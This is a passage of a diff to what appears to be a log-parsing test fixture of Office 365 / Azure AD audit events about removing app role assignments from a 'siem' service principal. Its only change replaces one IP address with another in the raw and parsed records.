Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12186,9 +12186,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -12422,7 +12422,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12452,9 +12452,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -12688,7 +12688,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\